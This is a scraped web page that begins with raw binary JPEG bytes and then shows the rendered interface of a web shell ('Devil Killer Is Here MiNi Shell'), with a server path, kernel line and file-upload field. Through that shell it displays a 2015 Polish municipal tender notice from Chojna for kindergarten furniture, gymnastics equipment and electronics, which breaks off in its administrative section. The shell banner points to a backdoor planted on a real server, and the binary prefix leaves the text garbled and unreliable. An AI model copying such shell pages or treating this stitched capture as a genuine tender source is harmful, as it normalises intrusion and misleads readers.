JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150325/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150325/66560-N-2015.html

<p class="kh_header"><b>Chojna: Polsko - Niemieckie Centrum ds. Młodzieży, 
Edukacji i komunikacji w związku gmin Oder- Welse gminie Passow i gminie Pinnow  oraz gminach Chojna, Gryfino, Kołbaskowo, Stare Czarnowo i Wałcz-  dostawa wyposażenia do Przedszkola Miejskiego w Chojnie</b><br>
<b>Numer ogłoszenia: 66560 - 2015; data zamieszczenia: 25.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Chojna , ul. Jagiellońska 4, 74-500 Chojna, woj. zachodniopomorskie, tel. 091 4141485: 4141035, faks 0914141117.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.chojna.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Polsko - Niemieckie Centrum ds. Młodzieży, 
Edukacji i komunikacji w związku gmin Oder- Welse gminie Passow i gminie Pinnow  oraz gminach Chojna, Gryfino, Kołbaskowo, Stare Czarnowo i Wałcz-  dostawa wyposażenia do Przedszkola Miejskiego w Chojnie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1) Zadanie dotyczy dostawy wyposażenia wraz z  montażem do Przedszkola Miejskiego     w Chojnie w  ramach zadania pod nazwą Polsko - Niemieckie Centrum ds. Młodzieży, Edukacji i komunikacji w związku gmin Oder-Welse gminie Passow i gminie Pinnow  oraz gminach Chojna, Gryfino, Kołbaskowo, Stare Czarnowo i Wałcz  dostawa wyposażenia do Przedszkola Miejskiego w Chojnie,
2) Wykonawca ma dostarczyć wyposażenie wymieniony poniżej w tabeli  A i B : 
Lpp.	Rodzaj sprzętu	Opis słowny	Ilość
1.Regał na książki	Regał wyposażony w 3 półki z przegródkami. Wykonany z płyty wiórowej w tonacji buku, z kolorowymi elementami z płyty MDF. wymiary 74 x 40 x 70 cm	6 szt.
2.sześcioosobowy stolik dla dzieci	Stolik sześciokątny, blat z płyty laminowanej o gr. ok. 18 mm, wykończenie PCV (gr. ok 2 mm) w kolorze lub w tonacji buku, możliwość dobrania nóg do stołu w 4 wysokościach lub nogi z możliwością regulacji wysokości, wymiary dł. boku dł. przekątnej 72x128 cm, kolor - bukowy.	10 szt.
3.	Krzesełka dziecięce	Cechy: szerokie, zaokrąglone oparcie, siedzisko wykonane ze sklejki o gr. ok. 8 mm eliminujące ucisk pod kolanami w 
trakcie siedzenia, stelaż wykonany z rury okrągłej o średnicy 
ok. 25 mm, podstawa krzesła w kształcie litery H 
zapewniająca wysoką stabilność, możliwość stawiania krzesła
 jednego na drugim, możliwość zawieszania krzesła, 
ochronne plastikowe zatyczki chroniące przed zarysowaniem.	60 szt.
4.	Krzesełka dla starszych dzieci	Krzesełka z siedziskiem i oparciem wykonanym ze sklejki bukowej w kolorze naturalnym, o gr.  8 mm w 
Stelaż został wykonany z rury płasko- owalnej o wym. 38 x 
20 mm i 30 x 15 mm. Wyprofilowane siedzisko eliminujące 
ucisk pod kolanami w trakcie siedzenia. Podstawa w kształcie 
litery H zapewnia wysoką stabilność. Blat  chroniony przed 
zarysowaniem 3 stopkami umieszczonymi pod siedziskiem 
oraz wyposażony w zatyczki z tworzywa sztucznego 
chroniące podłogę przed zarysowaniem. Krzesełka można 
stawiać jedno na drugim, a także zawieszać na blacie. Zgodne
 z normą PN -EN 1729-1: 2007 oraz PN -EN 1729-2: 2007. 	2 szt.
5.	Tablica korkowa	Tablica o wym. 60cmx 90 cm wykonana jest z miękkiej płyty pilśniowej o gr. 8mm. Płyta oklejona  korkiem technicznym 
grubości 1mm. Rama tablicy wykonana z drewna 1 
klasy. W komplecie powinny znajdować się gwoździki i dwie 
metalowe zawieszki do zamocowania tablicy na ścianie. 	7 szt.
6.	Łóżeczko 	Łóżeczko ze stalową konstrukcją i tkaniną przepuszczającą 
powietrze, Narożniki z tworzywa sztucznego stanowiące 
jednocześnie nóżki łóżeczka, a ich konstrukcja pozwalana 
na układanie łóżeczek jedno na drugim. Wymiary. 132 x 60 x 
12,5 cm 	20 szt. kolor zielony
25 szt. kolor żółty
7.	Szafka rtv	Szafka wykonana z płyty wiórowej w tonacji buku o gr. 18 
mm, z obrzeżem o gr. 2 mm. Wyposażona w dużą przegrodę 
na telewizor plazmowy lub LCD. Na dole  półeczki
 na sprzęt audiowizualny. Zaopatrzona w drzwi zamykane na 
klucz. Szafa musi być mocowana do ściany. 
 wym. szafy 113,8 x 40 x 
123,6 cm 
 wym. wnęki 110 x 69 x 36 cm	6 szt.
8.	Dywan do sali zabaw	Dywan przeznaczony do użytkowania w obiektach 
publicznych  (przedszkole), posiadający  wysoki stopień 
odporności na zapalenie oraz ścieranie (potwierdzone 
atestami).
 skład surowcowy: polipropylen lub 
poliamid
 dywan jednokolorowy lub kolorowy
delikatne wzory - odcienie 
pomarańczowego, zielonego, jasnego 
brązu, beżu itp.
  wielkość: 4x5m 
Dywany mają posiadać Certyfikat Zgodności - tzn. Atest 
Higieniczny oraz  Cfl-s1 (wg normy EN 1307)	6 szt.
9.	Regał 
biblioteczny	1. Regał biblioteczki z białej płyty 
wiórowej, z kolorowymi 
   elementami o wym. 60 x 35 x 90 cm
2. Biblioteczka z białej płyty
wiórowej o wym. 42 x 60 x 90 cm,
   z kolorowymi elementami,
posiadająca 2 półki o wym. 42 x 60
   oraz pojemnik na kółkach
3. Biblioteczka z białej płyty 
wiórowej, z kolorowymi elementami 
   o wym. 130 x 42 x 70 cm 
wyposażona dodatkowo w 2 poduszki 
   w kształcie ćwiartki koła o  wym. 32 x 32 x 10 cm    	1 komplet
10.	Meble 
przedszkolne 	Zestaw składa się z :
jednego regału kolorowego (zielony) 
wykonanego z kolorowej 
 płyty MDF  o wym. 50 x 30 x 170cm.
 wyposażonego w 4 półki;
trzech szafek kwadratowych o wym.
90,6 x 40 x 90,4 cm  wyposażonych w 
2 małe półeczki w górnej części mebla
 i 1dużą  półkę w dolnej części.  
2 szt. drzwiczek małych, 
pojedynczych o wym. 44,8 x 40 cm 
  w kolorze jasny zielony 
dopasowanych do szafki kwadrat 
  z półkami, 
 2 szt. drzwiczek małych, 
pojedynczych o wym. 44,8 x 40 cm 
  w kolorze ciemny zielony 
dopasowanych do szafki kwadrat 
  z półkami, 
2 szt. drzwiczek małych 
pojedynczych o wym. 44,8 x 40 cm 
  w kolorze jasny żółty dopasowanych do szafki kwadrat z półkami, 
2 szt. drzwiczek małych 
pojedynczych o wym. 44,8 x 40 cm 
 w kolorze ciemny żółty 
dopasowanych do szafki kwadrat 
  z półkami, 
8 szt. uchwytów do szafki w kształcie
 kwadratu  o wym. 10 x 10 x  2,2 cm
DŁUGOŚĆ ZESTAWU 3,22 m	1 zestaw
11.	Meble 
przedszkolne 	Zestaw składa się z :
1 szt. szafki z jedną  półką w kolorze 
białym o wym. 90,6 x 40 x 50  cm
 trzech szafek kwadratowych o wym.
 90,6 x 40 x 90,4 cm  wyposażonych 
w 2 małe półeczki w górnej części 
mebla i 1dużą  półkę w dolnej części.  
2 szt. drzwiczek małych, 
pojedynczych o wym. 44,8 x 40 cm 
  w kolorze czerwonym 
dopasowanych do szafki kwadrat z 
półkami, 
 2 szt. drzwiczek małych, 
pojedynczych o wym. 44,8 x 40 cm 
  w kolorze bordowym dopasowanych 
do szafki kwadrat z półkami, 
 2 szt. drzwiczek małych 
pojedynczych o wym. 44,8 x 40 cm 
  w kolorze jasny żółty dopasowanych 
do szafki kwadrat z półkami, 
2 szt. drzwiczek małych 
pojedynczych o wym. 44,8 x 40 cm 
 w kolorze ciemny żółty 
dopasowanych do szafki kwadrat 
  z półkami, 
 8 szt. uchwytów do szafki w 
kształcie kwadratu  o wym. 10 x 10 x
  2,2 cm
DŁUGOŚĆ ZESTAWU 3,62 m	1 zestaw
12.	Dydaktyczny 
kącik 
przyrodniczy	Stolik na kółkach z półkami do przechowywania różnego 
rodzaju akcesoriów. Wykonany z płyty wiórowej w tonacji 
buku, z obrzeżem PCV. 
Wym. 90 x 60 x 86 cm	2 szt.
13.	Szafka do 
dydaktycznego 
kącika 
ekologicznego	Szafka do kącika ekologicznego w kształcie jeża z 3 półkami 
do przechowywania darów przyrody.
Wym. 100 x 39 x 124 cm	1 szt.
14.	Szafka do 
dydaktycznego 
kącika 
ekologicznego	Szafka narożna do kącika ekologicznego w kształcie żołędzia 
z 2 półkami do przechowywania darów przyrody, wykonana
 z płyty wiórowej w tonacji brzozy i kolorowej płyty MDF. wym. 48 x 48 x 116 cm 	1 szt.
15.	Drewniana skrzynia na 
klocki	Skrzynia z litego drewna w kolorze naturalnego drewna z 
zamontowaną klapą, lakierowana, umożliwia 
przechowywanie np. klocków, zabawek. Wym. 80 x 41 x 52 cm, pojemność 170 litrów	8 szt.
16.	Zestaw 
przyborów 
gimnastycznych	W zestawie: 
- skakanki -10 szt.
- gra serso - 2 szt.	2 zestawy
17.	Zestaw 
przyborów 
gimnastycznych	W zestawie: 
- Szarfa gimnastyczna, 
różnokolorowa, Wym. obwód 120 
cm, szerokość 4 cm - 8 szt. zielonych,
  8 szt. niebieskich,  8 szt. żółtych, 
 8 szt. czerwonych
-woreczki z grochem,  4 podstawowe 
kolory, 4 sztuki w komplecie, 
wymiary: 12 x 12 cm, waga- 100g.  - 6 kompletów	1 zestaw
18.	Zestaw 
przyborów 
gimnastycznych	W zestawie:
- Obręcze hula-hop, różnokolorowe, Wymiary: śr. 60 cm.- 15 szt.
- aktywne ringo wykonane z dobrej jakości tworzywa, które można rozciągać bez ryzyka odkształceń, pakowane po 6 szt. Wymiary: śr. 16,4 cm. - 2 opakowania	1 zestaw
19.	Zestaw 
przyborów 
gimnastycznych	W zestawie:
-Tunel prosty,(Wymiary: śr. 46 cm, dł. 180 cm). -1 szt
- Sensoryczne piłki pakowane po 4 szt., różnokolorowe do treningu dłoni-wymiary: śr. 10 cm. - 6 kompletów	1 zestaw
20.	Zestaw 
przyborów 
gimnastycznych	W zestawie:
- Piłka nożna wykonana z materiału pu -pvc, 4-warstwowa, rozmiar 5, 14-panelowa, 410 - 440 gramów, baza lateksowa ,zawór zwrotny, butylowy - 2 szt.
-pachołki małe W pięciu kolorach, do tworzenia torów przeszkód. wys. 22 cm - 1 komplet	1 zestaw
21.	Zestaw 
przyborów 
gimnastycznych	W zestawie:
- Wygibajtus owocowy gra polegająca na postawieniu
 swoich stóp i dłoni w odpowiednich miejscach na 
planszy. Gracz, który nie może zająć na planszy wskazanego 
miejsca odpada. Wygrywa ten, kto szczęśliwie losował i był 
najbardziej wygimnastykowany.  W zestawie: 
tablica ze wskazówką, mata o wym. 
170 cm x 125 cm, instrukcja  - 1 szt.
- worki do skakania z 2 uchwytami do 
ćwiczeń sportowych, różne kolory, 
wym. 25 x 25 x 60 cm  -2 szt.	1 zestaw
22.	Zestaw 
przyborów 
gimnastycznych	W zestawie:
- kolorowe stopy, wykonane z gumy, 
o chropowatej powierzchni, przydatne
 do ćwiczeń sensorycznych oraz do 
zabaw sportowych.  wym. 9 x 23 cm -
36 szt. (18 par)
- obręcze gimnastyczne serso, dla 
dzieci do ćwiczeń. 4 podstawowe 
kolory 20 sztuk w komplecie -
2 komplety	1 zestaw

Tabela B
L.p.	Sprzęt elektroniczny	ilość
1.	Telewizor	4 szt.
2.	Odtwarzacz DVD	4 szt.
3.	Tablica interaktywna z projektorem, osprzętem i oprogramowaniem	4 szt.
4.	Radioodbiornik z odtwarzaczem CD	7 szt.
5.	Ekran do projekcji na statywie	1 szt.
6.	Notebook (laptop)	1 szt.
7.	Sprzęt nagłaśniający (wzmacniacz, głośniki, mikrofon)	1 szt.
8.	Projektor multimedialny	1 szt.
  i wnieść je do sali, rozpakować, zamontować, ustawić  w miejscu wyznaczonym przez Dyrektora Przedszkola Miejskiego w Chojnie, zamontować trwale jeżeli tego wymaga wyposażenie odpowiednimi elementami mocującymi na które przedstawi atesty a montaż wykonają osoby z odpowiednim doświadczeniem, opakowanie zabrać i zagospodarować we własnym zakresie.
3) Odbiór dokonany zostanie w terminie 3 dni roboczych od dnia zgłoszenia gotowości do przekazania wyposażenia. Odbioru dokona Dyrektor Przedszkola Miejskiego w Chojnie. Na okoliczność odbioru Wykonawca przygotuje protokół w 3 egzemplarzach oraz w wersji elektronicznej w formacie Excell.
4) W razie zgłoszenia przez Zamawiającego uwag, które wykluczają przyjęcie wyposażenia w całości lub w części Wykonawca dostarczy w terminie 7 dni roboczych nowe wyposażenie wolne od wad o czym powiadomi zamawiającego. Procedura odbioru zostanie rozpoczęta od nowa.
5) Jako załącznik do dokumentacji powykonawczej, na dostarczone urządzenia i sprzęty należy dostarczyć odpowiednie certyfikaty, deklaracje zgodności lub aprobaty techniczne oraz karty gwarancyjne, w zależności od rodzaju dostarczonego wyposażenia.
6) Wykonawca wraz z wyposażeniem dostarcza, będącego dopełnieniem protokołu zdawczo-odbiorczego:
a) specyfikację przekazywanych urządzeń z określeniem ich nazwy handlowej oraz podaniem parametrów;
b) zestawienie ewidencyjne przekazanych urządzeń z podaniem ich oznaczeń identyfikacyjnych oraz oznaczeń licencyjnych.

7) Każde urządzenie musi posiadać:
a) trwałe oznaczenie identyfikacyjne, tj. trwałą tabliczkę znamionową;
b) instrukcje obsługi lub podręcznik użytkowania w języku polskim;
c) kartę gwarancyjną;
8) Koszt realizacji przedmiotu zamówienia - ceny jednostkowe oraz całość realizacji zamówienia, należy określić w oparciu  o załączony szczegółowy wykaz wyposażenia (kosztorys ofertowy) załącznik Nr 1.2.,  do SIWZ
9)Wykonawca zobowiązuje się, aby wszystkie elementy przedmiotu dostawy były wykonane 
z materiałów dopuszczonych do obrotu i stosowania przez Sanepid, posiadały atesty lub 
certyfikaty PZH, HACCP. Nie mogą one zawierać elementów, które mogłyby stanowić 
zagrożenie dla zdrowia i życia użytkowników.
10) Wykonawca udzieli na dostarczone wyposażenie gwarancji jakości na okres określony                w wykazie  wyposażenia od dnia dokonania odbioru, obejmującej wszelkie wady konstrukcyjne i materiałowe dostarczonych  przedmiotów.
11) Wykonawca zobowiązany jest do dokonywania bezpłatnych napraw gwarancyjnych 
wyposażenia w    miejscu dostawy. Okres oczekiwania na naprawę wynosi 2 dni od momentu 
zgłoszenia przez  Zamawiającego usterki. Okres gwarancji dla naprawianego elementu ulega 
wydłużeniu o czas do usunięcia wad.

3)      Parametry techniczne sprzętu elektronicznego. 
Szczegółowe parametry sprzętu elektronicznego zawiera SIWZ oraz zawarte są w opisie przedmiotu zamówienia załącznik nr 1.1. do SIWZ.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.16.10.00-8, 32.30.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od precyzowania w powyższym zakresie wymagań, których spełnienie Wykonawca zobowiązany byłby wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od precyzowania w powyższym zakresie wymagań, których spełnienie Wykonawca zobowiązany byłby wykazać w sposób szczególny.
Zamawiający uzna warunek za spełniony i dokona oceny spełnienia warunków udziału w postępowaniu w oparciu o oświadczenie z art. 22 ust. 1 ustawy Pzp, złożone przez Wykonawcę w niniejszym postępowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od precyzowania w powyższym zakresie wymagań, których spełnienie Wykonawca zobowiązany byłby wykazać w sposób szczególny.
Zamawiający uzna warunek za spełniony i dokona oceny spełnienia warunków udziału w postępowaniu w oparciu o oświadczenie z art. 22 ust. 1 ustawy Pzp, złożone przez Wykonawcę w niniejszym postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od precyzowania w powyższym zakresie wymagań, których spełnienie Wykonawca zobowiązany byłby wykazać w sposób szczególny.
Zamawiający uzna warunek za spełniony i dokona oceny spełnienia warunków udziału w postępowaniu w oparciu o oświadczenie z art. 22 ust. 1 ustawy Pzp, złożone przez Wykonawcę w niniejszym postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od precyzowania w powyższym zakresie wymagań, których spełnienie Wykonawca zobowiązany byłby wykazać w sposób szczególny.
Zamawiający uzna warunek za spełniony i dokona oceny spełnienia warunków udziału w postępowaniu w oparciu o oświadczenie z art. 22 ust. 1 ustawy Pzp, złożone przez Wykonawcę w niniejszym postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Informacja o podwykonawcach.
     Wykonawca wskaże w ofercie części zamówienia, której wykonanie zamierza powierzyć       podwykonawcy/om Jeżeli podwykonawca nie zostanie wskazany      
     w ofercie - przyjmuje się, że całe zamówienie zrealizuje Wykonawca.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Gwarancja - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 ust. 1 ustawy, Zamawiający dopuszcza zmianę umowy w przypadkach:
1) zmiany stawki VAT,
2) wystąpienia okoliczności zakończenia produkcji lub wycofania przedmiotu zamówienia,  dopuszcza się zmianę na nowy przedmiot zamówienia o tych samych bądź lepszych  parametrach w porównaniu z określonymi w SIWZ, w cenie nie wyższej od podanej   w ofercie Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
